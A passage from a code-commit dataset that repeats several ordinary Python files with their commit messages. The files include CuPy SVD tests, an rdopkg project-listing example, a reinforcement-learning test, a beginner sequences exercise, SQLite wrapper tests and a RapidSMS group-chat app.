a_imag = numpy.random.random((m, n)).astype(numpy.float32)
self.a = a_real + 1.j * a_imag
elif self.dtype == numpy.complex128:
a_real = numpy.random.random((m, n)).astype(numpy.float64)
a_imag = numpy.random.random((m, n)).astype(numpy.float64)
self.a = a_real + 1.j * a_imag
else:
self.a = numpy.random.random((m, n)).astype(self.dtype)
def test_gesvdj(self):
a = cupy.array(self.a, order=self.order)
u, s, v = cusolver.gesvdj(a, full_matrices=self.full_matrices,
overwrite_a=self.overwrite_a)
m, n = self.shape
mn = min(m, n)
if self.full_matrices:
sigma = numpy.zeros((m, n), dtype=self.dtype)
for i in range(mn):
sigma[i][i] = s[i]
sigma = cupy.array(sigma)
else:
sigma = cupy.diag(s)
if self.dtype in (numpy.complex64, numpy.complex128):
vh = v.T.conjugate()
else:
vh = v.T
aa = cupy.matmul(cupy.matmul(u, sigma), vh)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(aa, self.a, decimal=decimal)
def test_gesvdj_no_uv(self):
a = cupy.array(self.a, order=self.order)
s = cusolver.gesvdj(a, full_matrices=self.full_matrices,
compute_uv=False, overwrite_a=self.overwrite_a)
expect = numpy.linalg.svd(self.a, full_matrices=self.full_matrices,
compute_uv=False)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(s, expect, decimal=decimal)
|
|
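
Every row also carries a `license` class (bsd-2-clause, mit, bsd-3-clause, apache-2.0, and artistic-2.0 all appear in this preview, out of 13 classes in total) and a comma-separated `repos` list. A hedged sketch of filtering on the license field before emitting training pairs:

```python
# Sketch: keep permissively licensed rows and yield prompt/response pairs.
# The allow-list is an illustrative assumption, not a statement about all
# 13 license classes in the dataset.
ALLOWED = {"mit", "bsd-2-clause", "bsd-3-clause", "apache-2.0"}

def training_pairs(rows):
    for row in rows:
        if row["license"] in ALLOWED:
            yield row["prompt_tagged"], row["response_tagged"]
```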
2ebf725edef293a87b6cf073fabb18bf4a7a8227
|
examples/rdo_projects.py
|
examples/rdo_projects.py
|
#!/usr/bin/env python
"""
An example script that uses rdopkg.actionmods.rdoinfo to output a list of
currently maintained RDO projects.
"""
from rdopkg.actionmods import rdoinfo
def list_projects():
inforepo = rdoinfo.get_default_inforepo()
info = inforepo.get_info()
pkgs = info['packages']
pkg_filter = {
'name': '^openstack-'
}
pkgs = rdoinfo.filter_pkgs(pkgs, pkg_filter)
for pkg in pkgs:
project = pkg.get('project') or pkg['name']
print("### " + project)
print("package: " + pkg['name'])
print("code: " + pkg['upstream'])
print("maintainers: " + " ".join(pkg['maintainers']))
print("")
if __name__ == '__main__':
list_projects()
|
Add an example of rdoinfo frontend usage
|
Add an example of rdoinfo frontend usage
|
Python
|
apache-2.0
|
redhat-openstack/rdopkg,redhat-openstack/rdopkg,openstack-packages/rdopkg,openstack-packages/rdopkg
|
Add an example of rdoinfo frontend usage
|
#!/usr/bin/env python
"""
An example script that uses rdopkg.actionmods.rdoinfo to output a list of
currently maintained RDO projects.
"""
from rdopkg.actionmods import rdoinfo
def list_projects():
inforepo = rdoinfo.get_default_inforepo()
info = inforepo.get_info()
pkgs = info['packages']
pkg_filter = {
'name': '^openstack-'
}
pkgs = rdoinfo.filter_pkgs(pkgs, pkg_filter)
for pkg in pkgs:
project = pkg.get('project') or pkg['name']
print("### " + project)
print("package: " + pkg['name'])
print("code: " + pkg['upstream'])
print("maintainers: " + " ".join(pkg['maintainers']))
print("")
if __name__ == '__main__':
list_projects()
|
<commit_before><commit_msg>Add an example of rdoinfo frontend usage<commit_after>
|
#!/usr/bin/env python
"""
An example script that uses rdopkg.actionmods.rdoinfo to output a list of
currently maintained RDO projects.
"""
from rdopkg.actionmods import rdoinfo
def list_projects():
inforepo = rdoinfo.get_default_inforepo()
info = inforepo.get_info()
pkgs = info['packages']
pkg_filter = {
'name': '^openstack-'
}
pkgs = rdoinfo.filter_pkgs(pkgs, pkg_filter)
for pkg in pkgs:
project = pkg.get('project') or pkg['name']
print("### " + project)
print("package: " + pkg['name'])
print("code: " + pkg['upstream'])
print("maintainers: " + " ".join(pkg['maintainers']))
print("")
if __name__ == '__main__':
list_projects()
|
Add an example of rdoinfo frontend usage#!/usr/bin/env python
"""
An example script that uses rdopkg.actionmods.rdoinfo to output a list of
currently maintained RDO projects.
"""
from rdopkg.actionmods import rdoinfo
def list_projects():
inforepo = rdoinfo.get_default_inforepo()
info = inforepo.get_info()
pkgs = info['packages']
pkg_filter = {
'name': '^openstack-'
}
pkgs = rdoinfo.filter_pkgs(pkgs, pkg_filter)
for pkg in pkgs:
project = pkg.get('project') or pkg['name']
print("### " + project)
print("package: " + pkg['name'])
print("code: " + pkg['upstream'])
print("maintainers: " + " ".join(pkg['maintainers']))
print("")
if __name__ == '__main__':
list_projects()
|
<commit_before><commit_msg>Add an example of rdoinfo frontend usage<commit_after>#!/usr/bin/env python
"""
An example script that uses rdopkg.actionmods.rdoinfo to output a list of
currently maintained RDO projects.
"""
from rdopkg.actionmods import rdoinfo
def list_projects():
inforepo = rdoinfo.get_default_inforepo()
info = inforepo.get_info()
pkgs = info['packages']
pkg_filter = {
'name': '^openstack-'
}
pkgs = rdoinfo.filter_pkgs(pkgs, pkg_filter)
for pkg in pkgs:
project = pkg.get('project') or pkg['name']
print("### " + project)
print("package: " + pkg['name'])
print("code: " + pkg['upstream'])
print("maintainers: " + " ".join(pkg['maintainers']))
print("")
if __name__ == '__main__':
list_projects()
|
|
ee0d901f0eb8c098e715485efb7d43ade4a8aeb8
|
tests/test_nsq.py
|
tests/test_nsq.py
|
import os
import unittest
import numpy as np
import chainer
from chainer import optimizers
import q_function
import nstep_q_learning
import async
import simple_abc
import random_seed
import replay_buffer
from simple_abc import ABC
class TestNSQ(unittest.TestCase):
def setUp(self):
pass
def test_abc(self):
self._test_abc(1)
self._test_abc(5)
def _test_abc(self, t_max):
nproc = 8
def agent_func():
n_actions = 3
q_func = q_function.FCSIQFunction(1, n_actions, 10, 2)
opt = optimizers.RMSprop(1e-3, eps=1e-2)
opt.setup(q_func)
return nstep_q_learning.NStepQLearning(q_func, opt, t_max,
0.9, 0.1,
i_target=10)
def env_func():
return simple_abc.ABC()
def run_func(agent, env):
total_r = 0
episode_r = 0
for i in xrange(5000):
total_r += env.reward
episode_r += env.reward
action = agent.act(env.state, env.reward, env.is_terminal)
if env.is_terminal:
print 'i:{} episode_r:{}'.format(i, episode_r)
episode_r = 0
env.initialize()
else:
env.receive_action(action)
print 'pid:{}, total_r:{}'.format(os.getpid(), total_r)
return agent
# Train
final_agent = async.run_async(nproc, agent_func, env_func, run_func)
# Test
env = env_func()
total_r = env.reward
while not env.is_terminal:
action = final_agent.q_function.sample_greedily_with_value(
env.state.reshape((1,) + env.state.shape))[0][0]
print 'state:', env.state, 'action:', action
env.receive_action(action)
total_r += env.reward
self.assertAlmostEqual(total_r, 1)
|
Add an ABC test for n-step Q-learning
|
Add an ABC test for n-step Q-learning
|
Python
|
mit
|
toslunar/chainerrl,toslunar/chainerrl
|
Add an ABC test for n-step Q-learning
|
import os
import unittest
import numpy as np
import chainer
from chainer import optimizers
import q_function
import nstep_q_learning
import async
import simple_abc
import random_seed
import replay_buffer
from simple_abc import ABC
class TestNSQ(unittest.TestCase):
def setUp(self):
pass
def test_abc(self):
self._test_abc(1)
self._test_abc(5)
def _test_abc(self, t_max):
nproc = 8
def agent_func():
n_actions = 3
q_func = q_function.FCSIQFunction(1, n_actions, 10, 2)
opt = optimizers.RMSprop(1e-3, eps=1e-2)
opt.setup(q_func)
return nstep_q_learning.NStepQLearning(q_func, opt, t_max,
0.9, 0.1,
i_target=10)
def env_func():
return simple_abc.ABC()
def run_func(agent, env):
total_r = 0
episode_r = 0
for i in xrange(5000):
total_r += env.reward
episode_r += env.reward
action = agent.act(env.state, env.reward, env.is_terminal)
if env.is_terminal:
print 'i:{} episode_r:{}'.format(i, episode_r)
episode_r = 0
env.initialize()
else:
env.receive_action(action)
print 'pid:{}, total_r:{}'.format(os.getpid(), total_r)
return agent
# Train
final_agent = async.run_async(nproc, agent_func, env_func, run_func)
# Test
env = env_func()
total_r = env.reward
while not env.is_terminal:
action = final_agent.q_function.sample_greedily_with_value(
env.state.reshape((1,) + env.state.shape))[0][0]
print 'state:', env.state, 'action:', action
env.receive_action(action)
total_r += env.reward
self.assertAlmostEqual(total_r, 1)
|
<commit_before><commit_msg>Add an ABC test for n-step Q-learning<commit_after>
|
import os
import unittest
import numpy as np
import chainer
from chainer import optimizers
import q_function
import nstep_q_learning
import async
import simple_abc
import random_seed
import replay_buffer
from simple_abc import ABC
class TestNSQ(unittest.TestCase):
def setUp(self):
pass
def test_abc(self):
self._test_abc(1)
self._test_abc(5)
def _test_abc(self, t_max):
nproc = 8
def agent_func():
n_actions = 3
q_func = q_function.FCSIQFunction(1, n_actions, 10, 2)
opt = optimizers.RMSprop(1e-3, eps=1e-2)
opt.setup(q_func)
return nstep_q_learning.NStepQLearning(q_func, opt, t_max,
0.9, 0.1,
i_target=10)
def env_func():
return simple_abc.ABC()
def run_func(agent, env):
total_r = 0
episode_r = 0
for i in xrange(5000):
total_r += env.reward
episode_r += env.reward
action = agent.act(env.state, env.reward, env.is_terminal)
if env.is_terminal:
print 'i:{} episode_r:{}'.format(i, episode_r)
episode_r = 0
env.initialize()
else:
env.receive_action(action)
print 'pid:{}, total_r:{}'.format(os.getpid(), total_r)
return agent
# Train
final_agent = async.run_async(nproc, agent_func, env_func, run_func)
# Test
env = env_func()
total_r = env.reward
while not env.is_terminal:
action = final_agent.q_function.sample_greedily_with_value(
env.state.reshape((1,) + env.state.shape))[0][0]
print 'state:', env.state, 'action:', action
env.receive_action(action)
total_r += env.reward
self.assertAlmostEqual(total_r, 1)
|
Add an ABC test for n-step Q-learningimport os
import unittest
import numpy as np
import chainer
from chainer import optimizers
import q_function
import nstep_q_learning
import async
import simple_abc
import random_seed
import replay_buffer
from simple_abc import ABC
class TestNSQ(unittest.TestCase):
def setUp(self):
pass
def test_abc(self):
self._test_abc(1)
self._test_abc(5)
def _test_abc(self, t_max):
nproc = 8
def agent_func():
n_actions = 3
q_func = q_function.FCSIQFunction(1, n_actions, 10, 2)
opt = optimizers.RMSprop(1e-3, eps=1e-2)
opt.setup(q_func)
return nstep_q_learning.NStepQLearning(q_func, opt, t_max,
0.9, 0.1,
i_target=10)
def env_func():
return simple_abc.ABC()
def run_func(agent, env):
total_r = 0
episode_r = 0
for i in xrange(5000):
total_r += env.reward
episode_r += env.reward
action = agent.act(env.state, env.reward, env.is_terminal)
if env.is_terminal:
print 'i:{} episode_r:{}'.format(i, episode_r)
episode_r = 0
env.initialize()
else:
env.receive_action(action)
print 'pid:{}, total_r:{}'.format(os.getpid(), total_r)
return agent
# Train
final_agent = async.run_async(nproc, agent_func, env_func, run_func)
# Test
env = env_func()
total_r = env.reward
while not env.is_terminal:
action = final_agent.q_function.sample_greedily_with_value(
env.state.reshape((1,) + env.state.shape))[0][0]
print 'state:', env.state, 'action:', action
env.receive_action(action)
total_r += env.reward
self.assertAlmostEqual(total_r, 1)
|
<commit_before><commit_msg>Add an ABC test for n-step Q-learning<commit_after>import os
import unittest
import numpy as np
import chainer
from chainer import optimizers
import q_function
import nstep_q_learning
import async
import simple_abc
import random_seed
import replay_buffer
from simple_abc import ABC
class TestNSQ(unittest.TestCase):
def setUp(self):
pass
def test_abc(self):
self._test_abc(1)
self._test_abc(5)
def _test_abc(self, t_max):
nproc = 8
def agent_func():
n_actions = 3
q_func = q_function.FCSIQFunction(1, n_actions, 10, 2)
opt = optimizers.RMSprop(1e-3, eps=1e-2)
opt.setup(q_func)
return nstep_q_learning.NStepQLearning(q_func, opt, t_max,
0.9, 0.1,
i_target=10)
def env_func():
return simple_abc.ABC()
def run_func(agent, env):
total_r = 0
episode_r = 0
for i in xrange(5000):
total_r += env.reward
episode_r += env.reward
action = agent.act(env.state, env.reward, env.is_terminal)
if env.is_terminal:
print 'i:{} episode_r:{}'.format(i, episode_r)
episode_r = 0
env.initialize()
else:
env.receive_action(action)
print 'pid:{}, total_r:{}'.format(os.getpid(), total_r)
return agent
# Train
final_agent = async.run_async(nproc, agent_func, env_func, run_func)
# Test
env = env_func()
total_r = env.reward
while not env.is_terminal:
action = final_agent.q_function.sample_greedily_with_value(
env.state.reshape((1,) + env.state.shape))[0][0]
print 'state:', env.state, 'action:', action
env.receive_action(action)
total_r += env.reward
self.assertAlmostEqual(total_r, 1)
|
|
82ac3a4300dcde07402dd6e5ce50cafa39f4a243
|
training/level-1-the-zen-of-python/dragon-warrior/ST_sequences.py
|
training/level-1-the-zen-of-python/dragon-warrior/ST_sequences.py
|
my_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print (my_list[2])
print(len(my_list))
print(min(my_list))
print(max(my_list))
test_tuple = (1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
print(test_tuple[-4])
test_string = "mystring is here"
print(test_string)
print(list(test_string[-4:2]))
test_range = range(100)
print(list(test_range[8:66:-2]))
my_list.append('hello')
print(my_list)
print(my_list.count(4))
print(523 in test_range)
for number in test_range:
if number == 5:
print(number)
else:
print ("nope")
pass
|
Solve world issue for humanity
|
Solve world issue for humanity
|
Python
|
artistic-2.0
|
bigfatpanda-training/pandas-practical-python-primer,bigfatpanda-training/pandas-practical-python-primer
|
Solve world issue for humanity
|
my_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print (my_list[2])
print(len(my_list))
print(min(my_list))
print(max(my_list))
test_tuple = (1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
print(test_tuple[-4])
test_string = "mystring is here"
print(test_string)
print(list(test_string[-4:2]))
test_range = range(100)
print(list(test_range[8:66:-2]))
my_list.append('hello')
print(my_list)
print(my_list.count(4))
print(523 in test_range)
for number in test_range:
if number == 5:
print(number)
else:
print ("nope")
pass
|
<commit_before><commit_msg>Solve world issue for humanity<commit_after>
|
my_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print (my_list[2])
print(len(my_list))
print(min(my_list))
print(max(my_list))
test_tuple = (1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
print(test_tuple[-4])
test_string = "mystring is here"
print(test_string)
print(list(test_string[-4:2]))
test_range = range(100)
print(list(test_range[8:66:-2]))
my_list.append('hello')
print(my_list)
print(my_list.count(4))
print(523 in test_range)
for number in test_range:
if number == 5:
print(number)
else:
print ("nope")
pass
|
Solve world issue for humanitymy_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print (my_list[2])
print(len(my_list))
print(min(my_list))
print(max(my_list))
test_tuple = (1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
print(test_tuple[-4])
test_string = "mystring is here"
print(test_string)
print(list(test_string[-4:2]))
test_range = range(100)
print(list(test_range[8:66:-2]))
my_list.append('hello')
print(my_list)
print(my_list.count(4))
print(523 in test_range)
for number in test_range:
if number == 5:
print(number)
else:
print ("nope")
pass
|
<commit_before><commit_msg>Solve world issue for humanity<commit_after>my_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print (my_list[2])
print(len(my_list))
print(min(my_list))
print(max(my_list))
test_tuple = (1, 2, 3, 4, 5, 6, 7, 8, 9, 10)
print(test_tuple[-4])
test_string = "mystring is here"
print(test_string)
print(list(test_string[-4:2]))
test_range = range(100)
print(list(test_range[8:66:-2]))
my_list.append('hello')
print(my_list)
print(my_list.count(4))
print(523 in test_range)
for number in test_range:
if number == 5:
print(number)
else:
print ("nope")
pass
|
|
141421a868afbbf2e92c426202bbba8b49d55a38
|
tests/test_db.py
|
tests/test_db.py
|
# -*- coding: utf-8 -*-
"""Test database functionality."""
import sqlite3
import tempfile
import unittest
from contextlib import closing
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy.types import (
INTEGER,
TEXT,
)
from esis.db import Database
class DatabaseTest(unittest.TestCase):
"""Database wrapper test cases."""
def test_get_table_metadata(self):
"""Table metadata can be retrieved using index notation."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
table = database['messages']
schema = {column.name: type(column.type)
for column in table.columns}
self.assertDictEqual(
schema,
{'id': INTEGER, 'message': TEXT})
def test_get_unknown_table_metadata(self):
"""NoSuchTableError raised when table name is not found."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
with self.assertRaises(NoSuchTableError):
database['unknown']
def test_run_quick_check_passes(self):
"""Quick check passes for SQLite database."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
with Database(db_file.name) as database:
self.assertTrue(database.run_quick_check())
def test_run_quick_check_fails(self):
"""Quick check fails for non SQLite dtabase files."""
with tempfile.NamedTemporaryFile() as db_file:
db_file.write('this is a text file, not a database file')
db_file.flush()
with Database(db_file.name) as database:
self.assertFalse(database.run_quick_check())
def test_context_manager(self):
"""Connection is opened/closed when used as a context manager."""
database = Database(':memory:')
# Connection is None when database object is created
self.assertIsNone(database.connection)
with database:
# Connection is not closed inside the context
self.assertFalse(database.connection.closed)
# Connection is closed outside the context
self.assertTrue(database.connection.closed)
|
Add a few Database test cases
|
Add a few Database test cases
|
Python
|
mit
|
jcollado/esis
|
Add a few Database test cases
|
# -*- coding: utf-8 -*-
"""Test database functionality."""
import sqlite3
import tempfile
import unittest
from contextlib import closing
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy.types import (
INTEGER,
TEXT,
)
from esis.db import Database
class DatabaseTest(unittest.TestCase):
"""Database wrapper test cases."""
def test_get_table_metadata(self):
"""Table metadata can be retrieved using index notation."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
table = database['messages']
schema = {column.name: type(column.type)
for column in table.columns}
self.assertDictEqual(
schema,
{'id': INTEGER, 'message': TEXT})
def test_get_unknown_table_metadata(self):
"""NoSuchTableError raised when table name is not found."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
with self.assertRaises(NoSuchTableError):
database['unknown']
def test_run_quick_check_passes(self):
"""Quick check passes for SQLite database."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
with Database(db_file.name) as database:
self.assertTrue(database.run_quick_check())
def test_run_quick_check_fails(self):
"""Quick check fails for non SQLite dtabase files."""
with tempfile.NamedTemporaryFile() as db_file:
db_file.write('this is a text file, not a database file')
db_file.flush()
with Database(db_file.name) as database:
self.assertFalse(database.run_quick_check())
def test_context_manager(self):
"""Connection is opened/closed when used as a context manager."""
database = Database(':memory:')
# Connection is None when database object is created
self.assertIsNone(database.connection)
with database:
# Connection is not closed inside the context
self.assertFalse(database.connection.closed)
# Connection is closed outside the context
self.assertTrue(database.connection.closed)
|
<commit_before><commit_msg>Add a few Database test cases<commit_after>
|
# -*- coding: utf-8 -*-
"""Test database functionality."""
import sqlite3
import tempfile
import unittest
from contextlib import closing
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy.types import (
INTEGER,
TEXT,
)
from esis.db import Database
class DatabaseTest(unittest.TestCase):
"""Database wrapper test cases."""
def test_get_table_metadata(self):
"""Table metadata can be retrieved using index notation."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
table = database['messages']
schema = {column.name: type(column.type)
for column in table.columns}
self.assertDictEqual(
schema,
{'id': INTEGER, 'message': TEXT})
def test_get_unknown_table_metadata(self):
"""NoSuchTableError raised when table name is not found."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
with self.assertRaises(NoSuchTableError):
database['unknown']
def test_run_quick_check_passes(self):
"""Quick check passes for SQLite database."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
with Database(db_file.name) as database:
self.assertTrue(database.run_quick_check())
def test_run_quick_check_fails(self):
"""Quick check fails for non SQLite dtabase files."""
with tempfile.NamedTemporaryFile() as db_file:
db_file.write('this is a text file, not a database file')
db_file.flush()
with Database(db_file.name) as database:
self.assertFalse(database.run_quick_check())
def test_context_manager(self):
"""Connection is opened/closed when used as a context manager."""
database = Database(':memory:')
# Connection is None when database object is created
self.assertIsNone(database.connection)
with database:
# Connection is not closed inside the context
self.assertFalse(database.connection.closed)
# Connection is closed outside the context
self.assertTrue(database.connection.closed)
|
Add a few Database test cases# -*- coding: utf-8 -*-
"""Test database functionality."""
import sqlite3
import tempfile
import unittest
from contextlib import closing
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy.types import (
INTEGER,
TEXT,
)
from esis.db import Database
class DatabaseTest(unittest.TestCase):
"""Database wrapper test cases."""
def test_get_table_metadata(self):
"""Table metadata can be retrieved using index notation."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
table = database['messages']
schema = {column.name: type(column.type)
for column in table.columns}
self.assertDictEqual(
schema,
{'id': INTEGER, 'message': TEXT})
def test_get_unknown_table_metadata(self):
"""NoSuchTableError raised when table name is not found."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
with self.assertRaises(NoSuchTableError):
database['unknown']
def test_run_quick_check_passes(self):
"""Quick check passes for SQLite database."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
with Database(db_file.name) as database:
self.assertTrue(database.run_quick_check())
def test_run_quick_check_fails(self):
"""Quick check fails for non SQLite dtabase files."""
with tempfile.NamedTemporaryFile() as db_file:
db_file.write('this is a text file, not a database file')
db_file.flush()
with Database(db_file.name) as database:
self.assertFalse(database.run_quick_check())
def test_context_manager(self):
"""Connection is opened/closed when used as a context manager."""
database = Database(':memory:')
# Connection is None when database object is created
self.assertIsNone(database.connection)
with database:
# Connection is not closed inside the context
self.assertFalse(database.connection.closed)
# Connection is closed outside the context
self.assertTrue(database.connection.closed)
|
<commit_before><commit_msg>Add a few Database test cases<commit_after># -*- coding: utf-8 -*-
"""Test database functionality."""
import sqlite3
import tempfile
import unittest
from contextlib import closing
from sqlalchemy.exc import NoSuchTableError
from sqlalchemy.types import (
INTEGER,
TEXT,
)
from esis.db import Database
class DatabaseTest(unittest.TestCase):
"""Database wrapper test cases."""
def test_get_table_metadata(self):
"""Table metadata can be retrieved using index notation."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
table = database['messages']
schema = {column.name: type(column.type)
for column in table.columns}
self.assertDictEqual(
schema,
{'id': INTEGER, 'message': TEXT})
def test_get_unknown_table_metadata(self):
"""NoSuchTableError raised when table name is not found."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
database = Database(db_file.name)
with self.assertRaises(NoSuchTableError):
database['unknown']
def test_run_quick_check_passes(self):
"""Quick check passes for SQLite database."""
with tempfile.NamedTemporaryFile() as db_file:
with closing(sqlite3.connect(db_file.name)) as connection:
with closing(connection.cursor()) as cursor:
cursor.execute(
'CREATE TABLE messages (id INTEGER, message TEXT)')
with Database(db_file.name) as database:
self.assertTrue(database.run_quick_check())
def test_run_quick_check_fails(self):
"""Quick check fails for non SQLite dtabase files."""
with tempfile.NamedTemporaryFile() as db_file:
db_file.write('this is a text file, not a database file')
db_file.flush()
with Database(db_file.name) as database:
self.assertFalse(database.run_quick_check())
def test_context_manager(self):
"""Connection is opened/closed when used as a context manager."""
database = Database(':memory:')
# Connection is None when database object is created
self.assertIsNone(database.connection)
with database:
# Connection is not closed inside the context
self.assertFalse(database.connection.closed)
# Connection is closed outside the context
self.assertTrue(database.connection.closed)
|
|
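A minimal sketch of the esis.db.Database interface the tests above exercise; this is an assumed shape only, built on a SQLAlchemy engine with 1.4-style reflection, and the real class may differ:
# Hypothetical sketch only; the real esis.db.Database may differ.
from sqlalchemy import MetaData, Table, create_engine, exc, text
class Database(object):
    """SQLite wrapper with the interface the tests above rely on."""
    def __init__(self, path):
        self.engine = create_engine('sqlite:///{}'.format(path))
        self.metadata = MetaData()
        self.connection = None
    def __getitem__(self, table_name):
        # Reflection raises NoSuchTableError for unknown table names
        return Table(table_name, self.metadata, autoload_with=self.engine)
    def run_quick_check(self):
        try:
            with self.engine.connect() as conn:
                row = conn.execute(text('PRAGMA quick_check')).fetchone()
            return row[0] == 'ok'
        except exc.DatabaseError:
            # Non-SQLite files fail with "file is not a database"
            return False
    def __enter__(self):
        self.connection = self.engine.connect()
        return self
    def __exit__(self, exc_type, exc_value, traceback):
        self.connection.close()
        return False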
e752e38c25f90065acc8b3c52a98bd0e1f4f3ebc
|
timelines/app.py
|
timelines/app.py
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
from rapidsms.apps.base import AppBase
from rapidsms.models import Connection
#from rapidsms.contrib.messagelog.models import Message
from .models import Reporter
class Chat(AppBase):
def _send_chat_msg(self, msg):
if msg.contact is None:
msg.respond('Sorry you must be a registered reporter')
return
reporter = Reporter.objects.filter(contact=msg.contact)
if not reporter:
msg.respond('Sorry you must be a registered reporter')
return
reporter = reporter[0]
if reporter.facility:
recipients = set(Connection.objects.filter(
contact__in=Reporter.objects.filter(
facility=reporter.facility).values_list('contact', flat=True)
))
else:
msg.respond("Sorry, you're not registered to a facility")
recipients.discard(msg.connection)
sender = msg.connection.identity
text = "{0}: {1}".format(sender, msg.text)
# respond to sender
sender_text = "sent to {0} members of {1}".format(len(recipients),
reporter.facility)
msg.respond(sender_text)
# 'respond' to group members
msg.respond(text, connections=list(recipients))
def handle(self, msg):
groups = []
mentions = []
for token in msg.text.split():
if token.startswith("#"):
groups.append(token[1:])
if token.startswith("@"):
mentions.append(token[1:])
groups = [i.lower() for i in groups]
mentions = [i.lower() for i in mentions]
if 'chat' in groups or 'chat' in mentions:
            # matched the chat tag; relay the message to reporters
            # from the sender's facility
self._send_chat_msg(msg)
return True
|
Add group chatting capability with the use of a special group chat
|
Add group chatting capability with the use of a special group chat
|
Python
|
bsd-3-clause
|
ewheeler/rapidsms-timelines,ewheeler/rapidsms-timelines,ewheeler/rapidsms-timelines
|
Add group chatting capability with the use of a special group chat
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
from rapidsms.apps.base import AppBase
from rapidsms.models import Connection
#from rapidsms.contrib.messagelog.models import Message
from .models import Reporter
class Chat(AppBase):
def _send_chat_msg(self, msg):
if msg.contact is None:
msg.respond('Sorry you must be a registered reporter')
return
reporter = Reporter.objects.filter(contact=msg.contact)
if not reporter:
msg.respond('Sorry you must be a registered reporter')
return
reporter = reporter[0]
if reporter.facility:
recipients = set(Connection.objects.filter(
contact__in=Reporter.objects.filter(
facility=reporter.facility).values_list('contact', flat=True)
))
else:
msg.respond("Sorry, you're not registered to a facility")
recipients.discard(msg.connection)
sender = msg.connection.identity
text = "{0}: {1}".format(sender, msg.text)
# respond to sender
sender_text = "sent to {0} members of {1}".format(len(recipients),
reporter.facility)
msg.respond(sender_text)
# 'respond' to group members
msg.respond(text, connections=list(recipients))
def handle(self, msg):
groups = []
mentions = []
for token in msg.text.split():
if token.startswith("#"):
groups.append(token[1:])
if token.startswith("@"):
mentions.append(token[1:])
groups = [i.lower() for i in groups]
mentions = [i.lower() for i in mentions]
if 'chat' in groups or 'chat' in mentions:
            # matched the chat tag; relay the message to reporters
            # from the sender's facility
self._send_chat_msg(msg)
return True
|
<commit_before><commit_msg>Add group chatting capability with the use of a special group chat<commit_after>
|
#!/usr/bin/env python
# vim: ai ts=4 sts=4 et sw=4
from rapidsms.apps.base import AppBase
from rapidsms.models import Connection
#from rapidsms.contrib.messagelog.models import Message
from .models import Reporter
class Chat(AppBase):
def _send_chat_msg(self, msg):
if msg.contact is None:
msg.respond('Sorry you must be a registered reporter')
return
reporter = Reporter.objects.filter(contact=msg.contact)
if not reporter:
msg.respond('Sorry you must be a registered reporter')
return
reporter = reporter[0]
if reporter.facility:
recipients = set(Connection.objects.filter(
contact__in=Reporter.objects.filter(
